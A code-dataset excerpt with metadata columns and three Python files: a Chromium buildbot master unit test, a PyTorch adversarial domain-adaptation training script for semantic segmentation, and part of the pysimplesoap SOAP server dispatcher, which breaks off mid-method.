hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8eb604ab527630f6782f71fc57175248b93e85b4
| 8,019
|
py
|
Python
|
infra/libs/buildbot/test/master_test.py
|
asdfghjjklllllaaa/infra
|
8f63af54e46194cd29291813f2790ff6e986804d
|
[
"BSD-3-Clause"
] | 1
|
2020-11-11T06:25:13.000Z
|
2020-11-11T06:25:13.000Z
|
infra/libs/buildbot/test/master_test.py
|
mcgreevy/chromium-infra
|
09064105713603f7bf75c772e8354800a1bfa256
|
[
"BSD-3-Clause"
] | 21
|
2020-09-06T02:41:05.000Z
|
2022-03-02T04:40:01.000Z
|
infra/libs/buildbot/test/master_test.py
|
asdfghjjklllllaaa/infra
|
8f63af54e46194cd29291813f2790ff6e986804d
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import json
import os
import requests
import simplejson
import subprocess
from infra.libs.buildbot import master
from testing_support import auto_stub
DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')
class TestMasterInformation(auto_stub.TestCase):
def setUp(self):
super(TestMasterInformation, self).setUp()
self.calls = []
self.master_data = [{
'alt_port': 8211,
'buildbot_url': 'http://build.chromium.org/p/chromium.fyi/',
'dirname': 'master.chromium.fyi',
'fullhost': 'master1.golo.chromium.org',
'host': 'master1.golo',
'internal': False,
'name': 'ChromiumFYI',
'port': 8011,
'slave_port': 8111
}]
def _handle_check_output(*args):
self.calls.append(args[0])
return json.dumps(self.master_data)
self.mock(subprocess, 'check_output', _handle_check_output)
self.chromium_fyi = os.path.join(DATA_DIR, 'master.chromium.fyi')
self.chromium_webkit = os.path.join(DATA_DIR, 'master.chromium.webkit')
self.chromium_linux = os.path.join(DATA_DIR, 'master.chromium.linux')
self.supersecret = os.path.join(
DATA_DIR, 'build_internal', 'masters', 'master.chromium.supersecret')
self.Response = collections.namedtuple('Response', ['status_code', 'json'])
self.res = None
self.requests_handler = lambda *_args, **_kwargs: self.res
def testPidIsRunning(self):
self.mock(master, '_pid_is_alive', lambda _x: True)
self.assertTrue(master.buildbot_is_running(self.chromium_fyi))
def testPidIsNotRunning(self):
self.mock(master, '_pid_is_alive', lambda _x: False)
self.assertFalse(master.buildbot_is_running(self.chromium_fyi))
def testPidfileNotThere(self):
# _pid_is_alive should not be called here and it is an error if it is.
# pylint: disable=redundant-unittest-assert
self.mock(
master, '_pid_is_alive',
lambda _x: self.assertTrue(False)) # pragma: no cover
# There is no twistd.pid in chromium.webkit.
self.assertFalse(master.buildbot_is_running(self.chromium_webkit))
def testNoActionsLog(self):
last_boot = master.get_last_boot(self.chromium_webkit)
self.assertIsNone(last_boot)
def testGetLastBoot(self):
last_boot = master.get_last_boot(self.chromium_fyi)
# Apr 23 2015 11:01:40 PDT.
self.assertEqual(last_boot, 1429812100)
def testGetLastNoNewBuilds(self):
last_no_new_builds = master.get_last_no_new_builds(self.chromium_fyi)
# Apr 23 2015 11:01:50 PDT.
self.assertEqual(last_no_new_builds, 1429812110)
def testGetLastNoNewBuildsNotThere(self):
last_no_new_builds = master.get_last_no_new_builds(self.chromium_webkit)
self.assertIsNone(last_no_new_builds)
def testGetLastNoNewBuildsButStarted(self):
last_no_new_builds = master.get_last_no_new_builds(self.chromium_linux)
self.assertIsNone(last_no_new_builds)
def testGetLastBootNotThere(self):
# 'make wait' is not in the sample actions.log.
last_make_wait = master._get_last_action(self.chromium_fyi, 'make wait')
self.assertIsNone(last_make_wait)
def testMasterWebPort(self):
master_port = master._get_master_web_port(self.chromium_fyi)
self.assertEquals(master_port, 8011)
self.assertEquals(len(self.calls), 1)
# no cover due to a bug in coverage (http://stackoverflow.com/a/35325514)
self.assertTrue(any(x.endswith('mastermap.py')
for x in self.calls[0])) # pragma: no cover
def testNoSuchMaster(self):
master_port = master._get_master_web_port(self.chromium_webkit)
self.assertIsNone(master_port)
def testMasterMapInternal(self):
master._get_master_web_port(self.supersecret)
self.assertEquals(len(self.calls), 1)
# no cover due to a bug in coverage (http://stackoverflow.com/a/35325514)
self.assertTrue(any(x.endswith('mastermap_internal.py')
for x in self.calls[0])) # pragma: no cover
def testGetBuildstate(self):
self.mock(requests, 'get', self.requests_handler)
self.res = self.Response(
status_code=200,
json=lambda: {
'accepting_builds': True,
'builders': {
'test': {
'current_builds': 3,
},
'other': {
'current_builds': 1,
},
'empty': {},
},
})
accepting_builds, running_builds = master.get_varz(self.chromium_fyi)
self.assertTrue(accepting_builds)
self.assertEqual(running_builds, {'test': 3, 'other': 1})
def testNotAcceptingBuilds(self):
self.mock(requests, 'get', self.requests_handler)
self.res = self.Response(
status_code=200,
json=lambda: {'accepting_builds': False})
accepting_builds, _ = master.get_varz(self.chromium_fyi)
self.assertFalse(accepting_builds)
def testAcceptingBuildsNoMaster(self):
accepting_builds, _ = master.get_varz(self.chromium_webkit)
self.assertIsNone(accepting_builds)
def testBadStatusCode(self):
# We shouldn't get to the JSON function since we hit 404.
# pylint: disable=redundant-unittest-assert
self.res = self.Response(
status_code=404,
json=lambda: self.assertTrue(False)) # pragma: no cover
self.mock(requests, 'get', self.requests_handler)
accepting_builds, _ = master.get_varz(self.chromium_fyi)
self.assertFalse(accepting_builds)
def testBadJson(self):
def raiser():
raise simplejson.scanner.JSONDecodeError('bad json', '', 0)
self.res = self.Response(
status_code=200,
json=raiser)
self.mock(requests, 'get', self.requests_handler)
accepting_builds, _ = master.get_varz(self.chromium_fyi)
self.assertFalse(accepting_builds)
def testTimeout(self):
def timeout(*_args, **_kwargs):
raise requests.exceptions.Timeout('timeout')
self.mock(requests, 'get', timeout)
accepting_builds, _ = master.get_varz(self.chromium_fyi)
self.assertIsNone(accepting_builds)
def testConnectionErr(self):
def timeout(*_args, **_kwargs):
raise requests.exceptions.ConnectionError('error')
self.mock(requests, 'get', timeout)
accepting_builds, _ = master.get_varz(self.chromium_fyi)
self.assertIsNone(accepting_builds)
def testMastermapHost(self):
masters = [
{'fullhost': 'bananas.cool'},
{'fullhost': 'bananas.cool'},
{'fullhost': 'bananas_dos.cool'},
]
self.mock(master, '_call_mastermap', lambda _x: masters)
self.assertEqual(
len(master.get_mastermap_for_host('fake', 'bananas.cool')),
2)
class TestMasterManipulation(auto_stub.TestCase):
def setUp(self):
super(TestMasterManipulation, self).setUp()
self.chromium_fyi = os.path.join(DATA_DIR, 'master.chromium.fyi')
def DISABLED_testWithGclientSyncEnabled(self): # pragma: no cover
actions = list(master.convert_action_items_to_cli((
master.GclientSync,
master.MakeStop,
master.MakeWait,
master.MakeStart,
master.MakeNoNewBuilds),
self.chromium_fyi,
enable_gclient=True))
self.assertEquals(
[a['cmd'] for a in actions],
[
['gclient', 'sync', '--reset', '--force', '--auto_rebase'],
['make', 'stop'],
['make', 'wait'],
['make', 'start'],
['make', 'no-new-builds'],
],
)
def testWithGclientSyncDisabled(self):
actions = list(master.convert_action_items_to_cli((
master.GclientSync,
master.MakeStop),
self.chromium_fyi))
self.assertEquals(
[a['cmd'] for a in actions],
[
['make', 'stop'],
],
)
def testInvalid(self):
with self.assertRaises(ValueError):
list(master.convert_action_items_to_cli((-100,), self.chromium_fyi))
| 34.123404
| 79
| 0.681506
|
ce66bb511d631a73acfb8472fe0a47fb976e50eb
| 14,835
|
py
|
Python
|
scripts/train_fcn_adda.py
|
Luodian/MADAN
|
7a2918da44f5203b72652bc4cba0e70057482114
|
[
"MIT"
] | 150
|
2019-10-29T01:22:31.000Z
|
2022-02-16T02:09:31.000Z
|
scripts/train_fcn_adda.py
|
pikachusocute/MADAN
|
7a2918da44f5203b72652bc4cba0e70057482114
|
[
"MIT"
] | 6
|
2020-01-05T16:56:51.000Z
|
2021-10-13T03:25:05.000Z
|
scripts/train_fcn_adda.py
|
pikachusocute/MADAN
|
7a2918da44f5203b72652bc4cba0e70057482114
|
[
"MIT"
] | 23
|
2019-11-04T15:46:29.000Z
|
2022-01-16T09:10:01.000Z
|
import logging
import os
import os.path
import sys
from collections import deque
from datetime import datetime
import click
import numpy as np
import torch
import torch.nn.functional as F
from tensorboardX import SummaryWriter
from torch.autograd import Variable
sys.path.append('/nfs/project/libo_iMADAN')
from cycada.data.adda_datasets import AddaDataLoader
from cycada.models import get_model
from cycada.models.models import models
from cycada.models import Discriminator
from cycada.util import config_logging
from cycada.tools.util import make_variable, mmd_loss
def check_label(label, num_cls):
"Check that no labels are out of range"
label_classes = np.unique(label.numpy().flatten())
label_classes = label_classes[label_classes < 255]
if len(label_classes) == 0:
print('All ignore labels')
return False
class_too_large = label_classes.max() > num_cls
if class_too_large or label_classes.min() < 0:
print('Labels out of bound')
print(label_classes)
return False
return True
def forward_pass(net, discriminator, im, requires_grad=False, discrim_feat=False):
if discrim_feat:
score, feat = net(im)
dis_score = discriminator(feat)
else:
score = net(im)
dis_score = discriminator(score)
if not requires_grad:
score = Variable(score.data, requires_grad=False)
return score, dis_score
def supervised_loss(score, label, weights=None):
loss_fn_ = torch.nn.NLLLoss(weight=weights, reduction='mean', ignore_index=255)
loss = loss_fn_(F.log_softmax(score, dim=1), label)
return loss
def discriminator_loss(score, target_val, lsgan=False):
if lsgan:
loss = 0.5 * torch.mean((score - target_val) ** 2)
else:
_, _, h, w = score.size()
target_val_vec = Variable(target_val * torch.ones(1, h, w), requires_grad=False).long().cuda()
loss = supervised_loss(score, target_val_vec)
return loss
def fast_hist(a, b, n):
k = (a >= 0) & (a < n)
return np.bincount(n * a[k].astype(int) + b[k], minlength=n ** 2).reshape(n, n)
def seg_accuracy(score, label, num_cls):
_, preds = torch.max(score.data, 1)
hist = fast_hist(label.cpu().numpy().flatten(),
preds.cpu().numpy().flatten(), num_cls)
intersections = np.diag(hist)
unions = (hist.sum(1) + hist.sum(0) - np.diag(hist) + 1e-8) * 100
acc = np.diag(hist).sum() / hist.sum()
return intersections, unions, acc
@click.command()
@click.argument('output')
@click.option('--dataset', required=True, multiple=True)
@click.option('--datadir', default="", type=click.Path(exists=True))
@click.option('--lr', '-l', default=0.0001)
@click.option('--momentum', '-m', default=0.9)
@click.option('--batch', default=1)
@click.option('--snapshot', '-s', default=5000)
@click.option('--downscale', type=int)
@click.option('--resize', default=None, type=int)
@click.option('--crop_size', default=None, type=int)
@click.option('--half_crop', default=None)
@click.option('--cls_weights', type=click.Path(exists=True))
@click.option('--weights_discrim', type=click.Path(exists=True))
@click.option('--weights_init', type=click.Path(exists=True))
@click.option('--model', default='fcn8s', type=click.Choice(models.keys()))
@click.option('--lsgan/--no_lsgan', default=False)
@click.option('--num_cls', type=int, default=19)
@click.option('--gpu', default='0')
@click.option('--max_iter', default=10000)
@click.option('--lambda_d', default=1.0)
@click.option('--lambda_g', default=1.0)
@click.option('--train_discrim_only', default=False)
@click.option('--with_mmd_loss/--no_mmd_loss', default=False)
@click.option('--discrim_feat/--discrim_score', default=False)
@click.option('--weights_shared/--weights_unshared', default=False)
@click.option('--data_flag', type=str, default=None)
@click.option('--small', type=int, default=2)
def main(output, dataset, datadir, lr, momentum, snapshot, downscale, cls_weights, gpu,
weights_init, num_cls, lsgan, max_iter, lambda_d, lambda_g,
train_discrim_only, weights_discrim, crop_size, weights_shared,
discrim_feat, half_crop, batch, model, data_flag, resize, with_mmd_loss, small):
# So data is sampled in consistent way
np.random.seed(1336)
torch.manual_seed(1336)
logdir = 'runs/{:s}/{:s}_to_{:s}/lr{:.1g}_ld{:.2g}_lg{:.2g}'.format(model, dataset[0],
dataset[1], lr, lambda_d, lambda_g)
if weights_shared:
logdir += '_weights_shared'
else:
logdir += '_weights_unshared'
if discrim_feat:
logdir += '_discrim_feat'
else:
logdir += '_discrim_score'
logdir += '/' + datetime.now().strftime('%Y_%b_%d-%H:%M')
writer = SummaryWriter(log_dir=logdir)
os.environ['CUDA_VISIBLE_DEVICES'] = gpu
config_logging()
print('Train Discrim Only', train_discrim_only)
if model == 'fcn8s':
net = get_model(model, num_cls=num_cls, pretrained=True, weights_init=weights_init, output_last_ft=discrim_feat)
else:
net = get_model(model, num_cls=num_cls, finetune=True, pretrained=True, weights_init=weights_init, output_last_ft=discrim_feat)
net.cuda()
str_ids = gpu.split(',')
gpu_ids = []
for str_id in str_ids:
id = int(str_id)
if id >= 0:
gpu_ids.append(id)
# set gpu ids
if len(gpu_ids) > 0:
torch.cuda.set_device(gpu_ids[0])
assert (torch.cuda.is_available())
net.to(gpu_ids[0])
net = torch.nn.DataParallel(net, gpu_ids)
if weights_shared:
net_src = net # shared weights
else:
net_src = get_model(model, num_cls=num_cls, finetune=True, pretrained=True, weights_init=weights_init, output_last_ft=discrim_feat)
net_src.eval()
# initialize Discrminator
odim = 1 if lsgan else 2
idim = num_cls if not discrim_feat else 4096
print('Discrim_feat', discrim_feat, idim)
print('Discriminator init weights: ', weights_discrim)
discriminator = Discriminator(input_dim=idim, output_dim=odim,
pretrained=not (weights_discrim == None),
weights_init=weights_discrim).cuda()
discriminator.to(gpu_ids[0])
discriminator = torch.nn.DataParallel(discriminator, gpu_ids)
loader = AddaDataLoader(net.module.transform, dataset, datadir, downscale, resize=resize,
crop_size=crop_size, half_crop=half_crop, batch_size=batch,
shuffle=True, num_workers=16, src_data_flag=data_flag, small=small)
print('dataset', dataset)
# Class weighted loss?
if cls_weights is not None:
weights = np.loadtxt(cls_weights)
else:
weights = None
# setup optimizers
opt_dis = torch.optim.SGD(discriminator.module.parameters(), lr=lr,
momentum=momentum, weight_decay=0.0005)
opt_rep = torch.optim.SGD(net.module.parameters(), lr=lr,
momentum=momentum, weight_decay=0.0005)
iteration = 0
num_update_g = 0
last_update_g = -1
losses_super_s = deque(maxlen=100)
losses_super_t = deque(maxlen=100)
losses_dis = deque(maxlen=100)
losses_rep = deque(maxlen=100)
accuracies_dom = deque(maxlen=100)
intersections = np.zeros([100, num_cls])
iu_deque = deque(maxlen=100)
unions = np.zeros([100, num_cls])
accuracy = deque(maxlen=100)
print('Max Iter:', max_iter)
net.train()
discriminator.train()
loader.loader_src.dataset.__getitem__(0, debug=True)
loader.loader_tgt.dataset.__getitem__(0, debug=True)
while iteration < max_iter:
for im_s, im_t, label_s, label_t in loader:
if iteration == 0:
print("IM S: {}".format(im_s.size()))
print("Label S: {}".format(label_s.size()))
print("IM T: {}".format(im_t.size()))
print("Label T: {}".format(label_t.size()))
if iteration > max_iter:
break
info_str = 'Iteration {}: '.format(iteration)
if not check_label(label_s, num_cls):
continue
###########################
# 1. Setup Data Variables #
###########################
im_s = make_variable(im_s, requires_grad=False)
label_s = make_variable(label_s, requires_grad=False)
im_t = make_variable(im_t, requires_grad=False)
label_t = make_variable(label_t, requires_grad=False)
#############################
# 2. Optimize Discriminator #
#############################
# zero gradients for optimizer
opt_dis.zero_grad()
opt_rep.zero_grad()
# extract features
if discrim_feat:
score_s, feat_s = net_src(im_s)
score_s = Variable(score_s.data, requires_grad=False)
f_s = Variable(feat_s.data, requires_grad=False)
else:
score_s = Variable(net_src(im_s).data, requires_grad=False)
f_s = score_s
dis_score_s = discriminator(f_s)
if discrim_feat:
score_t, feat_t = net(im_t)
score_t = Variable(score_t.data, requires_grad=False)
f_t = Variable(feat_t.data, requires_grad=False)
else:
score_t = Variable(net(im_t).data, requires_grad=False)
f_t = score_t
dis_score_t = discriminator(f_t)
dis_pred_concat = torch.cat((dis_score_s, dis_score_t))
# prepare real and fake labels
batch_t, _, h, w = dis_score_t.size()
batch_s, _, _, _ = dis_score_s.size()
dis_label_concat = make_variable(
torch.cat(
[torch.ones(batch_s, h, w).long(),
torch.zeros(batch_t, h, w).long()]
), requires_grad=False)
# compute loss for discriminator
loss_dis = supervised_loss(dis_pred_concat, dis_label_concat)
(lambda_d * loss_dis).backward()
losses_dis.append(loss_dis.item())
# optimize discriminator
opt_dis.step()
# compute discriminator acc
pred_dis = torch.squeeze(dis_pred_concat.max(1)[1])
dom_acc = (pred_dis == dis_label_concat).float().mean().item()
accuracies_dom.append(dom_acc * 100.)
# add discriminator info to log
info_str += " domacc:{:0.1f} D:{:.3f}".format(np.mean(accuracies_dom),
np.mean(losses_dis))
writer.add_scalar('loss/discriminator', np.mean(losses_dis), iteration)
writer.add_scalar('acc/discriminator', np.mean(accuracies_dom), iteration)
###########################
# Optimize Target Network #
########################### np.mean(accuracies_dom) > dom_acc_thresh
dom_acc_thresh = 60
if train_discrim_only and np.mean(accuracies_dom) > dom_acc_thresh:
os.makedirs(output, exist_ok=True)
torch.save(discriminator.module.state_dict(),
'{}/discriminator_abv60.pth'.format(output, iteration))
break
if not train_discrim_only and np.mean(accuracies_dom) > dom_acc_thresh:
last_update_g = iteration
num_update_g += 1
if num_update_g % 1 == 0:
print('Updating G with adversarial loss ({:d} times)'.format(num_update_g))
# zero out optimizer gradients
opt_dis.zero_grad()
opt_rep.zero_grad()
# extract features
if discrim_feat:
score_t, feat_t = net(im_t)
score_t = Variable(score_t.data, requires_grad=False)
f_t = feat_t
else:
score_t = net(im_t)
f_t = score_t
# score_t = net(im_t)
dis_score_t = discriminator(f_t)
# create fake label
batch, _, h, w = dis_score_t.size()
target_dom_fake_t = make_variable(torch.ones(batch, h, w).long(),
requires_grad=False)
# compute loss for target net
loss_gan_t = supervised_loss(dis_score_t, target_dom_fake_t)
(lambda_g * loss_gan_t).backward()
losses_rep.append(loss_gan_t.item())
writer.add_scalar('loss/generator', np.mean(losses_rep), iteration)
# optimize target net
opt_rep.step()
# log net update info
info_str += ' G:{:.3f}'.format(np.mean(losses_rep))
if (not train_discrim_only) and weights_shared and np.mean(accuracies_dom) > dom_acc_thresh:
print('Updating G using source supervised loss.')
# zero out optimizer gradients
opt_dis.zero_grad()
opt_rep.zero_grad()
# extract features
if discrim_feat:
score_s, feat_s = net(im_s)
else:
score_s = net(im_s)
loss_supervised_s = supervised_loss(score_s, label_s, weights=weights)
if with_mmd_loss:
print("Updating G using discrepancy loss")
lambda_discrepancy = 0.1
loss_mmd = mmd_loss(feat_s, feat_t) * 0.5 + mmd_loss(score_s, score_t) * 0.5
loss_supervised_s += lambda_discrepancy * loss_mmd
loss_supervised_s.backward()
losses_super_s.append(loss_supervised_s.item())
info_str += ' clsS:{:.2f}'.format(np.mean(losses_super_s))
writer.add_scalar('loss/supervised/source', np.mean(losses_super_s), iteration)
# optimize target net
opt_rep.step()
# compute supervised losses for target -- monitoring only!!!no backward()
loss_supervised_t = supervised_loss(score_t, label_t, weights=weights)
losses_super_t.append(loss_supervised_t.item())
info_str += ' clsT:{:.2f}'.format(np.mean(losses_super_t))
writer.add_scalar('loss/supervised/target', np.mean(losses_super_t), iteration)
###########################
# Log and compute metrics #
###########################
if iteration % 10 == 0 and iteration > 0:
# compute metrics
intersection, union, acc = seg_accuracy(score_t, label_t.data, num_cls)
intersections = np.vstack([intersections[1:, :], intersection[np.newaxis, :]])
unions = np.vstack([unions[1:, :], union[np.newaxis, :]])
accuracy.append(acc.item() * 100)
acc = np.mean(accuracy)
mIoU = np.mean(np.maximum(intersections, 1) / np.maximum(unions, 1)) * 100
iu = (intersection / union) * 10000
iu_deque.append(np.nanmean(iu))
info_str += ' acc:{:0.2f} mIoU:{:0.2f}'.format(acc, np.mean(iu_deque))
writer.add_scalar('metrics/acc', np.mean(accuracy), iteration)
writer.add_scalar('metrics/mIoU', np.mean(mIoU), iteration)
logging.info(info_str)
iteration += 1
################
# Save outputs #
################
# every 500 iters save current model
if iteration % 500 == 0:
os.makedirs(output, exist_ok=True)
if not train_discrim_only:
torch.save(net.module.state_dict(),
'{}/net-itercurr.pth'.format(output))
torch.save(discriminator.module.state_dict(),
'{}/discriminator-itercurr.pth'.format(output))
# save labeled snapshots
if iteration % snapshot == 0:
os.makedirs(output, exist_ok=True)
if not train_discrim_only:
torch.save(net.module.state_dict(),
'{}/net-iter{}.pth'.format(output, iteration))
torch.save(discriminator.module.state_dict(),
'{}/discriminator-iter{}.pth'.format(output, iteration))
if iteration - last_update_g >= 3 * len(loader):
print('No suitable discriminator found -- returning.')
torch.save(net.module.state_dict(),
'{}/net-iter{}.pth'.format(output, iteration))
iteration = max_iter # make sure outside loop breaks
break
writer.close()
if __name__ == '__main__':
main()
| 33.947368
| 133
| 0.670442
|
db81e31298f08579b22bb87e588bb0ef1ac23df3
| 25,405
|
py
|
Python
|
tornado_demo/web2py/gluon/contrib/pysimplesoap/server.py
|
ls-2018/tips
|
1f5f5195d7181b5dd4616db02166f7f92c97f1cd
|
[
"MIT"
] | 2
|
2019-05-07T03:08:25.000Z
|
2020-05-22T10:10:00.000Z
|
tornado_demo/web2py/gluon/contrib/pysimplesoap/server.py
|
ls-2018/tips
|
1f5f5195d7181b5dd4616db02166f7f92c97f1cd
|
[
"MIT"
] | 7
|
2020-05-22T13:29:42.000Z
|
2021-09-23T23:30:25.000Z
|
tornado_demo/web2py/gluon/contrib/pysimplesoap/server.py
|
ls-2018/py
|
1f5f5195d7181b5dd4616db02166f7f92c97f1cd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation; either version 3, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
"""Pythonic simple SOAP Server implementation"""
from __future__ import unicode_literals
import sys
if sys.version_info[0] < 3:
is_py2 = True
else:
is_py2 = False
unicode = str
import datetime
import sys
import logging
import warnings
import re
import traceback
try:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
except ImportError:
from http.server import BaseHTTPRequestHandler, HTTPServer
from . import __author__, __copyright__, __license__, __version__
from .simplexml import SimpleXMLElement, TYPE_MAP, Date, Decimal
log = logging.getLogger(__name__)
# Deprecated?
NS_RX = re.compile(r'xmlns:(\w+)="(.+?)"')
class SoapFault(Exception):
def __init__(self, faultcode=None, faultstring=None, detail=None):
self.faultcode = faultcode or self.__class__.__name__
self.faultstring = faultstring or ''
self.detail = detail
class SoapDispatcher(object):
"""Simple Dispatcher for SOAP Server"""
def __init__(self, name, documentation='', action='', location='',
namespace=None, prefix=False,
soap_uri="http://schemas.xmlsoap.org/soap/envelope/",
soap_ns='soap',
namespaces={},
pretty=False,
debug=False,
**kwargs):
"""
:param namespace: Target namespace; xmlns=targetNamespace
:param prefix: Prefix for target namespace; xmlns:prefix=targetNamespace
:param namespaces: Specify additional namespaces; example: {'external': 'http://external.mt.moboperator'}
:param pretty: Prettifies generated xmls
:param debug: Use to add tracebacks in generated xmls.
Multiple namespaces
===================
It is possible to support multiple namespaces.
You need to specify additional namespaces by passing `namespace` parameter.
>>> dispatcher = SoapDispatcher(
... name = "MTClientWS",
... location = "http://localhost:8008/ws/MTClientWS",
... action = 'http://localhost:8008/ws/MTClientWS', # SOAPAction
... namespace = "http://external.mt.moboperator", prefix="external",
... documentation = 'moboperator MTClientWS',
... namespaces = {
... 'external': 'http://external.mt.moboperator',
... 'model': 'http://model.common.mt.moboperator'
... },
... ns = True)
Now the registered method must return node names with namespaces' prefixes.
>>> def _multi_ns_func(self, serviceMsisdn):
... ret = {
... 'external:activateSubscriptionsReturn': [
... {'model:code': '0'},
... {'model:description': 'desc'},
... ]}
... return ret
Our prefixes will be changed to those used by the client.
"""
self.methods = {}
self.name = name
self.documentation = documentation
self.action = action # base SoapAction
self.location = location
self.namespace = namespace # targetNamespace
self.prefix = prefix
self.soap_ns = soap_ns
self.soap_uri = soap_uri
self.namespaces = namespaces
self.pretty = pretty
self.debug = debug
@staticmethod
def _extra_namespaces(xml, ns):
"""Extends xml with extra namespaces.
:param ns: dict with namespaceUrl:prefix pairs
:param xml: XML node to modify
"""
if ns:
_tpl = 'xmlns:%s="%s"'
_ns_str = " ".join([_tpl % (prefix, uri) for uri, prefix in ns.items() if uri not in xml])
xml = xml.replace('/>', ' ' + _ns_str + '/>')
return xml
def register_function(self, name, fn, returns=None, args=None, doc=None, response_element_name=None):
self.methods[name] = fn, returns, args, doc or getattr(fn, "__doc__",
""), response_element_name or '%sResponse' % name
def response_element_name(self, method):
return self.methods[method][4]
def dispatch(self, xml, action=None, fault=None):
"""Receive and process SOAP call, returns the xml"""
# a dict can be sent in fault to expose it to the caller
# default values:
prefix = self.prefix
ret = None
if fault is None:
fault = {}
soap_ns, soap_uri = self.soap_ns, self.soap_uri
soap_fault_code = 'VersionMismatch'
name = None
# namespaces = [('model', 'http://model.common.mt.moboperator'), ('external', 'http://external.mt.moboperator')]
_ns_reversed = dict(((v, k) for k, v in self.namespaces.items())) # Switch keys-values
# _ns_reversed = {'http://external.mt.moboperator': 'external', 'http://model.common.mt.moboperator': 'model'}
try:
request = SimpleXMLElement(xml, namespace=self.namespace)
# detect soap prefix and uri (xmlns attributes of Envelope)
for k, v in request[:]:
if v in ("http://schemas.xmlsoap.org/soap/envelope/",
"http://www.w3.org/2003/05/soap-env",
"http://www.w3.org/2003/05/soap-envelope",):
soap_ns = request.attributes()[k].localName
soap_uri = request.attributes()[k].value
# If the value from attributes on Envelope is in additional namespaces
elif v in self.namespaces.values():
_ns = request.attributes()[k].localName
_uri = request.attributes()[k].value
_ns_reversed[_uri] = _ns # update with received alias
# Now we change 'external' and 'model' to the received forms i.e. 'ext' and 'mod'
# After that we know how the client has prefixed additional namespaces
decoded_xml = xml if is_py2 else xml.decode('utf8')
ns = NS_RX.findall(decoded_xml)
for k, v in ns:
if v in self.namespaces.values():
_ns_reversed[v] = k
soap_fault_code = 'Client'
# parse request message and get local method
method = request('Body', ns=soap_uri).children()(0)
if action:
# method name = action
name = action[len(self.action) + 1:-1]
prefix = self.prefix
if not action or not name:
# method name = input message name
name = method.get_local_name()
prefix = method.get_prefix()
log.debug('dispatch method: %s', name)
function, returns_types, args_types, doc, response_element_name = self.methods[name]
log.debug('returns_types %s', returns_types)
# de-serialize parameters (if type definitions given)
if args_types:
args = method.children().unmarshall(args_types)
elif args_types is None:
args = {'request': method} # send raw request
else:
args = {} # no parameters
soap_fault_code = 'Server'
# execute function
ret = function(**args)
log.debug('dispathed method returns: %s', ret)
except SoapFault as e:
fault.update({
'faultcode': "%s.%s" % (soap_fault_code, e.faultcode),
'faultstring': e.faultstring,
'detail': e.detail
})
except Exception: # This shouldn't be one huge try/except
import sys
etype, evalue, etb = sys.exc_info()
log.error(traceback.format_exc())
if self.debug:
detail = u''.join(traceback.format_exception(etype, evalue, etb))
detail += u'\n\nXML REQUEST\n\n' + xml.decode('UTF-8')
else:
detail = None
fault.update({'faultcode': "%s.%s" % (soap_fault_code, etype.__name__),
'faultstring': evalue,
'detail': detail})
# build response message
if not prefix:
xml = """<%(soap_ns)s:Envelope xmlns:%(soap_ns)s="%(soap_uri)s"/>"""
else:
xml = """<%(soap_ns)s:Envelope xmlns:%(soap_ns)s="%(soap_uri)s"
xmlns:%(prefix)s="%(namespace)s"/>"""
xml %= { # a %= {} is a shortcut for a = a % {}
'namespace': self.namespace,
'prefix': prefix,
'soap_ns': soap_ns,
'soap_uri': soap_uri
}
# Now we add extra namespaces
xml = SoapDispatcher._extra_namespaces(xml, _ns_reversed)
# Change our namespace alias to that given by the client.
# We put [('model', 'http://model.common.mt.moboperator'), ('external', 'http://external.mt.moboperator')]
# mix it with {'http://external.mt.moboperator': 'ext', 'http://model.common.mt.moboperator': 'mod'}
mapping = dict(
((k, _ns_reversed[v]) for k, v in self.namespaces.items())) # Switch keys-values and change value
# and get {'model': u'mod', 'external': u'ext'}
response = SimpleXMLElement(xml,
namespace=self.namespace,
namespaces_map=mapping,
prefix=prefix)
response['xmlns:xsi'] = "http://www.w3.org/2001/XMLSchema-instance"
response['xmlns:xsd'] = "http://www.w3.org/2001/XMLSchema"
body = response.add_child("%s:Body" % soap_ns, ns=False)
if fault:
# generate a Soap Fault (with the python exception)
body.marshall("%s:Fault" % soap_ns, fault, ns=False)
else:
# return normal value
res = body.add_child(self.response_element_name(name), ns=self.namespace)
if not prefix:
res['xmlns'] = self.namespace # add target namespace
# serialize returned values (response) if type definition available
if returns_types:
# TODO: full sanity check of type structure (recursive)
complex_type = isinstance(ret, dict)
if complex_type:
# check if type mapping correlates with return value
types_ok = all([k in returns_types for k in ret.keys()])
if not types_ok:
warnings.warn("Return value doesn't match type structure: "
"%s vs %s" % (str(returns_types), str(ret)))
